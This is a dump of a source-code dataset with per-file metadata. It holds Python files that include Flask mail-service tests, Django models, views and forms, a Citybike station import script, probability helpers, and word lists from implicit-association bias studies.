            response = c.post('/send', data=data)
            assert response.status_code == 400
            assert response.get_data(as_text=True) == "From address not defined (from_addr:str)"

    @mock.patch.dict(os.environ, {
        "SMTP_SERVER": "mail.test.com:587",
        "SMTP_LOGIN": "myself@test.com",
        "SMTP_PASSWD": "passwd"
    })
    def test_wrong_params(self, auth_headers):
        # Missing from_addr must be rejected with a 400.
        app = MailMS(env_var_prefix='SMTP')
        with app.test_client() as c:
            data = {
                'subject': "Test",
            }
            response = c.post('/send', data=data, headers=auth_headers)
            assert response.status_code == 400
            assert response.get_data(as_text=True) == "From address not defined (from_addr:str)"

    @mock.patch.dict(os.environ, {
        "SMTP_SERVER": "mail.test.com:587",
        "SMTP_LOGIN": "myself@test.com",
        "SMTP_PASSWD": "passwd"
    })
    @mock.patch.object(smtplib, 'SMTP', smtp_mock)
    def test_send_text(self, auth_headers):
        # A plain text mail is sent through the (mocked) SMTP connection.
        app = MailMS(env_var_prefix='SMTP')
        with app.test_client() as c:
            data = {
                'subject': "Test",
                'from_addr': "from@test.fr",
                'to_addrs': "to@test.fr",
            }
            response = c.post('/send', data=data, headers=auth_headers)
            assert response.status_code == 200
            assert response.get_data(as_text=True) == "Mail sent to to@test.fr"
            login_mock.assert_called_with('myself@test.com', 'passwd')
            send_mock.assert_called_once()

    @mock.patch.dict(os.environ, {
        "SMTP_SERVER": "mail.test.com:587",
        "SMTP_LOGIN": "myself@test.com",
        "SMTP_PASSWD": "passwd"
    })
    @mock.patch.object(smtplib, 'SMTP', smtp_mock)
    @mock.patch.object(message, 'EmailMessage', email_mock)
    def test_send_attachment(self, auth_headers):
        # A mail with a file attachment triggers add_attachment on the
        # (mocked) EmailMessage.
        app = MailMS(env_var_prefix='SMTP')
        with app.test_client() as c:
            file = BytesIO(b"hello {{ world_name }}")
            data = {
                'subject': "Test",
                'from_addr': "from@test.fr",
                'to_addrs': "to@test.fr",
                'attachments': [(file, 'file.txt')]
            }
            response = c.post('/send', data=data, headers=auth_headers)
            assert response.status_code == 200
            login_mock.assert_called_with('myself@test.com', 'passwd')
            add_mock.assert_called_once()
| 34.904348 | 96 | 0.598655 | 488 | 4,014 | 4.665984 | 0.196721 | 0.030742 | 0.034256 | 0.03733 | 0.600351 | 0.600351 | 0.591568 | 0.547211 | 0.547211 | 0.508564 | 0 | 0.008219 | 0.272546 | 4,014 | 114 | 97 | 35.210526 | 0.771575 | 0 | 0 | 0.53 | 0 | 0 | 0.183607 | 0 | 0 | 0 | 0 | 0 | 0.12 | 1 | 0.07 | false | 0.07 | 0.09 | 0.01 | 0.19 | 0.02 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6e674bba7e974aef69c88702fb52e95d608c0be3 | 2,101 | py | Python | whattowatch/core/models.py | svhenrique/What-To-Watch-backend | 3bab4ad825e13eead9dae23d68b5f91cd6133720 | [
"MIT"
] | null | null | null | whattowatch/core/models.py | svhenrique/What-To-Watch-backend | 3bab4ad825e13eead9dae23d68b5f91cd6133720 | [
"MIT"
] | 5 | 2022-02-15T04:29:33.000Z | 2022-03-25T03:09:23.000Z | whattowatch/core/models.py | svhenrique/What-To-Watch-backend | 3bab4ad825e13eead9dae23d68b5f91cd6133720 | [
"MIT"
] | null | null | null | from tabnanny import verbose
from embed_video.fields import EmbedVideoField
from core.utils import get_file_path
from django.db import models
from pydoc import describe
# Age-rating choices for WatchableContent.ratting_age.
# Value 0 renders as "L" — presumably "livre"/general audiences in the
# Brazilian classification system; the others are minimum ages.
CHOICES_RATTING = [
    (0, "L"),
    (10, "10"),
    (12, "12"),
    (14, "14"),
    (16, "16"),
    (18, "18"),
]
class Base(models.Model):
    """Abstract base model adding audit timestamps and an active flag."""
    created_at = models.DateField('Criação', auto_now_add=True)  # set once on insert
    updated_at = models.DateField('Atualização', auto_now=True)  # refreshed on every save
    active = models.BooleanField('Ativo', default=True)

    class Meta:
        abstract = True
class WatchableContent(Base):
    """A watchable item (movie or series) with metadata and view counters."""
    title = models.TextField(verbose_name="Título")
    description = models.TextField(verbose_name='Descrição')
    ratting_age = models.IntegerField(choices=CHOICES_RATTING)  # age rating, see CHOICES_RATTING
    poster = models.ImageField(verbose_name='Poster', upload_to=get_file_path, max_length=50)
    genres = models.TextField(verbose_name="Gêneros")
    release_date = models.DateField(verbose_name="Data de Lançamento", null=True, blank=True)
    # Rolling view counters — presumably reset/rolled over by an external
    # job; TODO confirm who updates these.
    daily_views = models.PositiveIntegerField(verbose_name="Vizualizações Diária", default=0)
    week_views = models.PositiveIntegerField(verbose_name="Vizualizações Semanal",default=0)
    year_views = models.PositiveIntegerField(verbose_name="Vizualizações Anual", default=0)

    def __str__(self):
        return self.title
class Episode(Base):
    """A single episode of a WatchableContent series."""
    name = models.TextField(verbose_name="Nome")
    # BUG FIX: the label was copy-pasted from the daily-views field
    # ("Vizualizações Diária"); this field is the episode number.
    episode = models.PositiveIntegerField(verbose_name="Episódio", default=0)
    content = models.ForeignKey(verbose_name="Conteúdo", to=WatchableContent, on_delete=models.CASCADE, related_name="episodes")
    description = models.TextField(verbose_name="Descrição")
    season = models.PositiveIntegerField(verbose_name="Temporada")
    video = EmbedVideoField()

    def __str__(self):
        return self.name
class HighlightedArea(Base):
    """A curated, positioned block of contents highlighted in the UI."""
    contents = models.ManyToManyField(verbose_name="Conteúdo", to=WatchableContent)
    title = models.TextField(verbose_name="Título")
    genres = models.TextField(verbose_name="Gêneros")
    position = models.PositiveIntegerField(verbose_name="Posição")

    def __str__(self):
        # Added for consistency with the sibling models and a readable
        # representation in the admin.
        return self.title
| 38.2 | 128 | 0.741552 | 244 | 2,101 | 6.196721 | 0.413934 | 0.123677 | 0.101852 | 0.12037 | 0.397487 | 0.32209 | 0.084656 | 0.084656 | 0 | 0 | 0 | 0.014992 | 0.142789 | 2,101 | 54 | 129 | 38.907407 | 0.824542 | 0 | 0 | 0.133333 | 0 | 0 | 0.107568 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044444 | false | 0 | 0.111111 | 0.044444 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6e693366aa73c3e5190dfeb165652aeea6e62694 | 515 | py | Python | test/test_markdown_converter.py | wgroeneveld/dokuwiki-to-hugo | cfe7193d8b040e2352b7a9bc83fffa7c1c5a859e | [
"MIT"
] | 8 | 2017-04-14T19:17:24.000Z | 2022-02-02T00:03:25.000Z | test/test_markdown_converter.py | wgroeneveld/dokuwiki-to-hugo | cfe7193d8b040e2352b7a9bc83fffa7c1c5a859e | [
"MIT"
] | 4 | 2017-05-26T18:11:10.000Z | 2020-07-25T09:09:26.000Z | test/test_markdown_converter.py | wgroeneveld/dokuwiki-to-hugo | cfe7193d8b040e2352b7a9bc83fffa7c1c5a859e | [
"MIT"
] | 5 | 2017-08-12T09:59:43.000Z | 2021-02-26T14:28:23.000Z | from unittest import TestCase
from pathlib import Path
from src.markdown_converter import MarkdownConverter
class TestMarkdownHeader(TestCase):
    """Acceptance test: convert the sample dokuwiki page and compare it
    against the expected markdown output file."""

    def setUp(self):
        self.converter = MarkdownConverter("test/dokuwiki_example.txt")

    def test_acceptance_test_case(self):
        # Path.read_text requires python 3.5 and up
        expected = Path("test/expected_markdown_output.txt").read_text()
        actual = self.converter.convert()
        # Removed stray debug print(actual) — it spammed the test output.
        self.assertEqual(expected, actual, "Files not matching!")
| 27.105263 | 72 | 0.718447 | 60 | 515 | 6.033333 | 0.616667 | 0.071823 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004819 | 0.194175 | 515 | 18 | 73 | 28.611111 | 0.86747 | 0.03301 | 0 | 0 | 0 | 0 | 0.155242 | 0.116935 | 0 | 0 | 0 | 0 | 0.090909 | 1 | 0.181818 | false | 0 | 0.272727 | 0 | 0.545455 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6e69531f478f33e6136dd7686cb0bcc4caa4db53 | 1,559 | py | Python | environ/blog/views.py | CassandraTalbot32/Python-Django-CSS-HTML-JavaScript-webiste | de81b971026991c6689a133e68582b04431ae265 | [
"MIT"
] | null | null | null | environ/blog/views.py | CassandraTalbot32/Python-Django-CSS-HTML-JavaScript-webiste | de81b971026991c6689a133e68582b04431ae265 | [
"MIT"
] | null | null | null | environ/blog/views.py | CassandraTalbot32/Python-Django-CSS-HTML-JavaScript-webiste | de81b971026991c6689a133e68582b04431ae265 | [
"MIT"
] | null | null | null | from django.shortcuts import render, get_object_or_404
from django.urls import reverse
# Create your views here.
from django.views.generic import (
CreateView,
DetailView,
ListView,
UpdateView,
ListView,
DeleteView
)
from .forms import ArticleModelForm
from .models import Article
class ArticleCreateView(CreateView):
    """Render and process the article creation form."""
    template_name = 'articles/article_create.html'
    form_class = ArticleModelForm
    queryset = Article.objects.all()

    def form_valid(self, form):
        # Removed debug print(form.cleaned_data) and the commented-out
        # success_url/get_success_url leftovers; CreateView's default
        # redirect (the object's get_absolute_url) is used.
        return super().form_valid(form)
class ArticleListView(ListView):
    """Display all articles."""
    template_name = 'articles/article_list.html'
    queryset = Article.objects.all()
class ArticleDetailView(DetailView):
    """Display a single article looked up by the `id` URL kwarg."""
    template_name = 'articles/article_detail.html'
    queryset = Article.objects.all()

    def get_object(self):
        # 404 (instead of a 500) when the id does not exist.
        id_ = self.kwargs.get("id")
        return get_object_or_404(Article, id=id_)
class ArticleUpdateView(UpdateView):
    """Render and process the article edit form."""
    template_name = 'articles/article_create.html'
    form_class = ArticleModelForm
    queryset = Article.objects.all()

    def get_object(self):
        # 404 (instead of a 500) when the id does not exist.
        id_ = self.kwargs.get("id")
        return get_object_or_404(Article, id=id_)

    def form_valid(self, form):
        # Removed debug print(form.cleaned_data); keep default handling.
        return super().form_valid(form)
class ArticleDeleteView(DeleteView):
    """Confirm and delete an article, then return to the list page."""
    template_name = 'articles/article_delete.html'
    queryset = Article.objects.all()

    def get_object(self):
        # 404 (instead of a 500) when the id does not exist.
        id_ = self.kwargs.get("id")
        return get_object_or_404(Article, id=id_)

    def get_success_url(self):
        return reverse('articles:article-list')
| 23.621212 | 54 | 0.766517 | 205 | 1,559 | 5.614634 | 0.263415 | 0.054735 | 0.086881 | 0.117289 | 0.549957 | 0.524761 | 0.482189 | 0.482189 | 0.482189 | 0.482189 | 0 | 0.008785 | 0.123797 | 1,559 | 65 | 55 | 23.984615 | 0.833821 | 0.048749 | 0 | 0.565217 | 0 | 0 | 0.111637 | 0.107578 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130435 | false | 0 | 0.108696 | 0.021739 | 0.73913 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6e6c3307591bcf16eccdf142b301e1d682d3f6ad | 1,237 | py | Python | import.py | Findus23/citybike | 4c8527934df94df6d1db8fa8630590ce4946f5a8 | [
"MIT"
] | null | null | null | import.py | Findus23/citybike | 4c8527934df94df6d1db8fa8630590ce4946f5a8 | [
"MIT"
] | 5 | 2016-10-27T16:51:20.000Z | 2017-01-08T21:49:29.000Z | import.py | Findus23/citybike | 4c8527934df94df6d1db8fa8630590ce4946f5a8 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import json
import sys
from pprint import pprint
import requests
from config import database
import MySQLdb
db = None
try:
    # Connect using the credentials from config.py.
    db = MySQLdb.connect(database["host"],
                         database["user"],
                         database["passwd"],
                         database["db"])
    cur = db.cursor()

    # Overpass QL: every Citybike Wien rental station inside area
    # 3600109166 (Vienna), as JSON.
    payload = {
        "data": (
            '[out:json][timeout:25];'
            'area(3600109166)->.searchArea;'
            'node["amenity"="bicycle_rental"]["network"="Citybike Wien"](area.searchArea);'
            'out body;>;out skel qt;'
        )
    }
    print("Overpass Abfrage")
    r = requests.get('https://overpass-api.de/api/interpreter', params=payload)
    data = r.json()
    print("erfolgreich")

    i = 0
    for station in data["elements"]:
        if station["type"] == "node":
            tags = station["tags"]
            # REPLACE keeps the table in sync: existing stations (same ref)
            # are overwritten, new ones inserted.
            cur.execute("REPLACE INTO stationen (ref, lon, lat, name) VALUES (%s,%s,%s,%s)",
                        (tags["ref"], station["lon"], station["lat"], tags["name"]))
            i += 1
    db.commit()
    print("%s Stationen importiert" % i)
except MySQLdb.Error as e:
    print("Error %d: %s" % (e.args[0], e.args[1]))
    sys.exit(1)
finally:
    # BUG FIX: the connection was previously only closed on the success
    # path; close it on errors as well (when it was opened at all).
    if db is not None:
        db.close()
| 25.244898 | 92 | 0.527082 | 141 | 1,237 | 4.617021 | 0.560284 | 0.009217 | 0.009217 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02093 | 0.30477 | 1,237 | 48 | 93 | 25.770833 | 0.736047 | 0.013743 | 0 | 0 | 0 | 0.027027 | 0.305168 | 0.105824 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.081081 | 0.189189 | 0 | 0.189189 | 0.135135 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6e71fc8679bdfe831d2f3bf5cb5827fa16257f9c | 929 | py | Python | bke/bke_client/forms.py | Ntermast/BKE | 5a9b71c7c81102a2a3759bfa720d15e27ec96726 | [
"MIT"
] | null | null | null | bke/bke_client/forms.py | Ntermast/BKE | 5a9b71c7c81102a2a3759bfa720d15e27ec96726 | [
"MIT"
] | null | null | null | bke/bke_client/forms.py | Ntermast/BKE | 5a9b71c7c81102a2a3759bfa720d15e27ec96726 | [
"MIT"
] | null | null | null | from django import forms
from django.core.validators import FileExtensionValidator
from .models import Channel, Podcast
class ChannelForm(forms.ModelForm):
    """Form for uploading a channel's cover image."""
    image = forms.ImageField(required=True)

    class Meta:
        model = Channel
        fields = ('image',)
class PodcastForm(forms.ModelForm):
    """Form for creating a podcast: cover image plus an mp3 audio file."""
    image = forms.ImageField(required=True)
    # Only mp3 uploads are accepted.
    file = forms.FileField(required=True, validators=[FileExtensionValidator(
        allowed_extensions=['mp3'])])

    class Meta:
        model = Podcast
        fields = ('image', 'file')
class PodcastImageForm(forms.ModelForm):
    """Form for updating only a podcast's cover image."""
    image = forms.ImageField(required=True)

    class Meta:
        model = Podcast
        fields = ('image',)
class PodcastFileForm(forms.ModelForm):
    """Form for updating only a podcast's audio file (mp3 only)."""
    file = forms.FileField(required=True, validators=[FileExtensionValidator(
        allowed_extensions=['mp3'])])

    class Meta:
        model = Podcast
        fields = ('file',)
| 23.820513 | 78 | 0.672766 | 91 | 929 | 6.846154 | 0.307692 | 0.096308 | 0.089888 | 0.11557 | 0.653291 | 0.653291 | 0.616372 | 0.542536 | 0.542536 | 0.542536 | 0 | 0.002755 | 0.218515 | 929 | 38 | 79 | 24.447368 | 0.855372 | 0 | 0 | 0.615385 | 0 | 0 | 0.031216 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.115385 | 0 | 0.615385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6e7c323d646d86a4544c08eedbbd2426649d62c6 | 3,217 | py | Python | code/aip/misc/misc.py | andymiller/ReducedVarianceReparamGradients | 220b2ee4e9ef25e0d4d07632dc98582178c48160 | [
"MIT"
] | 36 | 2017-05-22T20:02:47.000Z | 2021-06-17T02:26:46.000Z | code/vbproj/misc/misc.py | andymiller/vboost | 4173756f4b506853442635116042c6907a318d86 | [
"MIT"
] | null | null | null | code/vbproj/misc/misc.py | andymiller/vboost | 4173756f4b506853442635116042c6907a318d86 | [
"MIT"
] | 5 | 2017-07-30T10:16:55.000Z | 2020-12-23T10:37:08.000Z | import autograd.numpy as np
from autograd.scipy.special import gammaln
def sigmoid(a):
    """Logistic function: map the real line onto (0, 1)."""
    neg_exp = np.exp(-a)
    return 1. / (1. + neg_exp)
def logit(a):
    """Inverse of the sigmoid: log(a / (1 - a))."""
    return np.log(a) - np.log(1 - a)
def mvn_diag_logpdf(x, mean, log_std):
    """Row-wise log density of N(mean, diag(exp(2*log_std))) at the rows of x."""
    dim = len(mean)
    variances = np.exp(2. * log_std)
    quad = -.5 * np.sum((x - mean) ** 2 / variances, axis=1)
    norm_const = -.5 * dim * np.log(2. * np.pi) - np.sum(log_std)
    return norm_const + quad
def mvn_diag_logpdf_grad(x, mean, log_std):
    """Gradient of mvn_diag_logpdf with respect to x.

    For a diagonal Gaussian, d/dx of the log density is
    -(x - mean) / exp(2 * log_std), applied elementwise per row.
    Previously an unimplemented stub that returned None.
    """
    return -(x - mean) / np.exp(2. * log_std)
def mvn_diag_entropy(log_std):
    """Entropy of a diagonal Gaussian given its per-dimension log std devs."""
    dim = len(log_std)
    const = .5 * dim * np.log(2 * np.pi * np.e)
    return const + np.sum(log_std)
def mvn_logpdf(x, mean, icholSigma):
    """Log density of N(mean, Sigma) where icholSigma = inv(chol(Sigma)).

    Accepts a single point or a stack of points; returns a scalar for a
    single point and a vector of log densities otherwise.
    """
    dim = len(mean)
    const = -.5 * dim * np.log(2. * np.pi)
    logdet = np.sum(np.log(np.diag(icholSigma)))
    whitened = np.dot(np.atleast_2d(x) - mean, icholSigma.T)
    quad = -.5 * np.sum(whitened ** 2, axis=1)
    out = const + logdet + quad
    return out[0] if len(out) == 1 else out
def mvn_fisher_info(params):
    """ returns the fisher information matrix (diagonal) for a multivariate
    normal distribution with params = [mu, ln sigma] """
    # BUG FIX: len(params) / 2 yields a float under Python 3, which makes
    # the slices below raise TypeError; use integer division.
    D = len(params) // 2
    mean, log_std = params[:D], params[D:]
    # Fisher info is 1/sigma^2 for each mean component and 2 for each
    # log-std component.
    return np.concatenate([np.exp(-2.*log_std),
                           2*np.ones(D)])
def kl_mvn(m0, S0, m1, S1):
    """KL( N(m0, S0) || N(m1, S1) ) for stacks of means m0, m1 (N x D)
    sharing a single pair of full covariances S0, S1.

    BUG FIX: the body referenced `npla`, which is never imported in this
    module (only autograd.numpy as np), so every call raised NameError;
    use np.linalg instead.
    """
    # .5 log det (Sig1 Sig0^-1)
    det_term = .5 * np.log(np.linalg.det(np.linalg.solve(S0, S1).T))
    # + .5 tr( Sig1^-1 * ((mu_0 - mu_1)(mu_0 - mu_1)^T + Sig0 - Sig1) )
    S1inv = np.linalg.inv(S1)
    diff = m0 - m1
    outers = np.einsum("id,ie->ide", diff, diff) + S0 - S1
    tr_term = .5 * np.einsum("de,ide->i", S1inv, outers)
    return det_term + tr_term
def kl_mvn_diag(m0, S0, m1, S1):
    """KL divergence between diagonal Gaussians, expressed in nats.

    Accepts stacks of means (N x D) but a single pair of diagonal
    covariances S0, S1 (length-D vectors of variances); also covers the
    divergence from one Gaussian to a set of Gaussians.

    From wikipedia:
        KL( (m0, S0) || (m1, S1) )
          = .5 * ( tr(S1^{-1} S0) + log |S1|/|S0| +
                   (m1 - m0)^T S1^{-1} (m1 - m0) - N )
    """
    dim = m0.shape[1]
    inv_S1 = 1. / S1
    delta = m1 - m0
    # the divergence decomposes into three terms
    trace_term = np.sum(inv_S1 * S0)
    logdet_term = np.sum(np.log(S1)) - np.sum(np.log(S0))
    quad_term = np.sum((delta * delta) * inv_S1, axis=1)
    return .5 * (trace_term + logdet_term + quad_term - dim)
def gamma_lnpdf(x, shape, rate):
    """Gamma log density in the shape/rate parameterization (wikipedia)."""
    norm_const = shape * np.log(rate) - gammaln(shape)
    kernel = (shape - 1.) * np.log(x) - rate * x
    return norm_const + kernel
def make_fixed_cov_mvn_logpdf(Sigma):
    """Return logpdf(x, mean) for a Gaussian with fixed covariance Sigma."""
    ichol = np.linalg.inv(np.linalg.cholesky(Sigma))

    def logpdf(x, mean):
        return mvn_logpdf(x, mean, ichol)

    return logpdf
def unpack_params(params):
    """Split a packed [mean, log_std] vector into its two equal halves."""
    first_half, second_half = np.split(params, 2)
    return first_half, second_half
def unconstrained_to_simplex(rhos):
    """Map K-1 unconstrained reals onto the K-simplex (softmax with the
    last logit pinned at 0)."""
    logits = np.concatenate([rhos, [0.]])
    expd = np.exp(logits)
    return expd / np.sum(expd)
def simplex_to_unconstrained(pis):
lnpis = np.log(pis)
return (lnpis - lnpis[-1])[:-1]
| 27.732759 | 75 | 0.596208 | 531 | 3,217 | 3.517891 | 0.278719 | 0.03212 | 0.026767 | 0.011242 | 0.071199 | 0.025696 | 0.025696 | 0.025696 | 0 | 0 | 0 | 0.038875 | 0.248368 | 3,217 | 115 | 76 | 27.973913 | 0.733664 | 0.250544 | 0 | 0.031746 | 0 | 0 | 0.008172 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0.015873 | 0.031746 | 0.031746 | 0.47619 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e846b2e612b3a93fb38f65ca3d72ef859516fa8 | 4,913 | py | Python | lists/Greenwald_1998_Perez_2010_lists.py | realliyifei/ConceptorDebias | f622de88661790da64697d6440bcc92ebc6f3413 | [
"Apache-2.0"
] | 10 | 2019-02-04T19:31:02.000Z | 2021-12-22T16:06:50.000Z | lists/Greenwald_1998_Perez_2010_lists.py | realliyifei/ConceptorDebias | f622de88661790da64697d6440bcc92ebc6f3413 | [
"Apache-2.0"
] | null | null | null | lists/Greenwald_1998_Perez_2010_lists.py | realliyifei/ConceptorDebias | f622de88661790da64697d6440bcc92ebc6f3413 | [
"Apache-2.0"
] | 8 | 2020-04-11T14:12:26.000Z | 2022-03-28T02:56:09.000Z | # Greewald et al. 1998
Japanese_names = ["Hitaka", "Yokomichi", "Fukamachi", "Yamamoto", "Itsumatsu", "Yagimoto", "Kawabashi", "Tsukimoto", "Kushibashi", "Tanaka", "Kuzumaki", "Takasawa", "Fujimoto", "Sugimoto", "Fukuyama", "Samukawa", "Harashima", "Sakata", "Kamakura", "Namikawa", "Kitayama", "Nakamoto", "Minakami", "Morimoto", "Miyamatsu"]
Korean_names = ["Hwang", "Hyun", "Choung", "Maeng", "Chun", "Choe", "Kwon", "Sunwoo", "Whang", "Byun", "Sohn", "Kung", "Youn", "Chae", "Choi", "Chon", "Kwan", "Jung", "Kang", "Hwangbo", "Bhak", "Paik", "Chong", "Jang", "Yoon"]
Truncated_Japanese_names = ["Hitak", "Yoko", "Fukama", "Yamam", "Itsu", "Yagi", "Kawa", "Tsukim", "Kushi", "Tana", "Kuzu", "Taka", "Fuji", "Sugi", "Fuku", "Samu", "Hara", "Saka", "Kama", "Namikaw", "Kita", "Naka", "Minak", "Mori", "Miya"]
White_American_male_names = ["Adam", "Chip", "Harry", "Josh", "Roger", "Alan", "Frank", "Ian", "Justin", "Ryan", "Andrew", "Fred", "Jack", "Matthew", "Stephen", "Brad", "Greg", "Jed", "Paul", "Todd", "Brandon", "Hank", "Jonathan", "Peter", "Wilbur"]
Black_American_male_names = ["Alonzo", "Jamel", "Lerone", "Percell", "Theo", "Alphonse", "Jerome", "Leroy", "Rasaan", "Torrance", "Darnell", "Lamar", "Lionel", "Rashaun", "Tyree", "Deion", "Lamont", "Malik", "Terrence", "Tyrone", "Everol", "Lavon", "Marcellus", "Terryl", "Wardell"]
White_American_female_names = ["Amanda", "Courtney", "Heather", "Melanie", "Sara", "Amber", "Crystal", "Katie", "Meredith", "Shannon", "Betsy", "Donna", "Kristin", "Nancy", "Stephanie", "Bobbie-Sue", "Ellen", "Lauren", "Peggy", "Sue-Ellen", "Colleen", "Emily", "Megan", "Rachel", "Wendy"]
Black_American_female_names = ["Aiesha", "Lashelle", "Nichelle", "Shereen", "Temeka", "Ebony", "Latisha", "Shaniqua", "Tameisha", "Teretha", "Jasmine", "Latonya", "Shanise", "Tanisha", "Tia", "Lakisha", "Latoya", "Sharise", "Tashika", "Yolanda", "Lashandra", "Malika", "Shavonn", "Tawanda", "Yvette"]
Positive_words = ["caress", "freedom", "health", "love", "peace", "cheer", "friend", "heaven", "loyal", "pleasure", "diamond", "gentle", "honest", "lucky", "rainbow", "diploma", "gift", "honor", "miracle", "sunrise", "family", "happy", "laughter", "paradise", "vacation"]
Negative_words = ["abuse", "crash", "filth", "murder", "sickness", "accident", "death", "grief", "poison", "stink", "assault", "disaster", "hatred", "pollute", "tragedy", "bomb", "divorce", "jail", "poverty", "ugly", "cancer", "evil", "kill", "rotten", "vomit", "agony", "prison"]
# NOTE: according to Greenwald et al. 1998 () divorce and kill were only in experiment 1 while prison was only in experiments 2 and 3
Negative_words_1 = ["abuse", "crash", "filth", "murder", "sickness", "accident", "death", "grief", "poison", "stink", "assault", "disaster", "hatred", "pollute", "tragedy", "bomb", "divorce", "jail", "poverty", "ugly", "cancer", "evil", "kill", "rotten", "vomit", "agony"]
Negative_words_2_3 = ["abuse", "crash", "filth", "murder", "sickness", "accident", "death", "grief", "poison", "stink", "assault", "disaster", "hatred", "pollute", "tragedy", "bomb", "jail", "poverty", "ugly", "cancer", "evil", "rotten", "vomit", "agony", "prison"]
Flowers = ["aster", "clover", "hyacinth", "marigold", "poppy", "azalea", "crocus", "iris", "orchid", "rose", "bluebell", "daffodil", "lilac", "pansy", "tulip", "buttercup", "daisy", "lily", "peony", "violet", "carnation", "gladiola", "magnolia", "petunia", "zinnia"]
Insects = ["ant", "caterpillar", "flea", "locust", "spider", "bedbug", "centipede", "fly", "maggot", "tarantula", "bee", "cockroach", "gnat", "mosquito", "termite", "beetle", "cricket", "hornet", "moth", "wasp", "blackfly", "dragonfly", "horsefly", "roach", "weevil"]
Instruments = ["bagpipe", "cello", "guitar", "lute", "trombone", "banjo", "clarinet", "harmonica", "mandolin", "trumpet", "bassoon", "drum", "harp", "oboe", "tuba", "bell", "fiddle", "harpsichord", "piano", "viola", "bongo", "flute", "horn", "saxophone", "violin"]
Weapons = ["arrow", "club", "gun", "missile", "spear", "axe", "dagger", "harpoon", "pistol", "sword", "blade", "dynamite", "hatchet", "rifle", "tank", "bomb", "firearm", "knife", "shotgun", "teargas", "cannon", "grenade", "mace", "slingshot", "whip"]
# Perez 2010
Latino_immigrant_surnames = ["García", "Martínez", "Rodríguez", "López", "Hernández", "González", "Pérez", "Sánchez", "Díaz", "Ramírez"]
White_immigrant_surnames = ["Smith", "Johnson", "Williams", "Jones", "Brown", "Davis", "Miller", "Wilson", "Moore", "Taylor"]
Asian_immigrant_surnames = ["Nguyen", "Liu", "Tran", "Chen", "Wong", "Wu", "Wang", "Choi", "Chang", "Yang"]
Good_words = ["Honest", "Joy", "Love", "Peace", "Wonderful", "Honor", "Pleasure", "Glorious", "Laughter", "Happy"]
Bad_words = ["Agony", "Prison", "Terrible", "Horrible", "Nasty", "Evil", "Awful", "Failure", "Hurt", "Poverty"]
good_words = [w.lower() for w in Good_words]
bad_words = [w.lower() for w in Bad_words]
| 163.766667 | 320 | 0.620191 | 529 | 4,913 | 5.693762 | 0.775047 | 0.012948 | 0.01494 | 0.020916 | 0.15073 | 0.14243 | 0.131142 | 0.131142 | 0.131142 | 0.131142 | 0 | 0.004097 | 0.105842 | 4,913 | 29 | 321 | 169.413793 | 0.681539 | 0.033177 | 0 | 0 | 0 | 0 | 0.530763 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e8a3821b3bae7c8d06c259c866a77fc11f08d4f | 2,006 | py | Python | app/test/send_data.py | gpp0725/EchoProxy | 0273f47397b76fa0292db267d99eeb9dccc4e869 | [
"Apache-2.0"
] | null | null | null | app/test/send_data.py | gpp0725/EchoProxy | 0273f47397b76fa0292db267d99eeb9dccc4e869 | [
"Apache-2.0"
] | null | null | null | app/test/send_data.py | gpp0725/EchoProxy | 0273f47397b76fa0292db267d99eeb9dccc4e869 | [
"Apache-2.0"
] | null | null | null | # !/usr/bin/env python
# -*- coding: utf-8 -*-
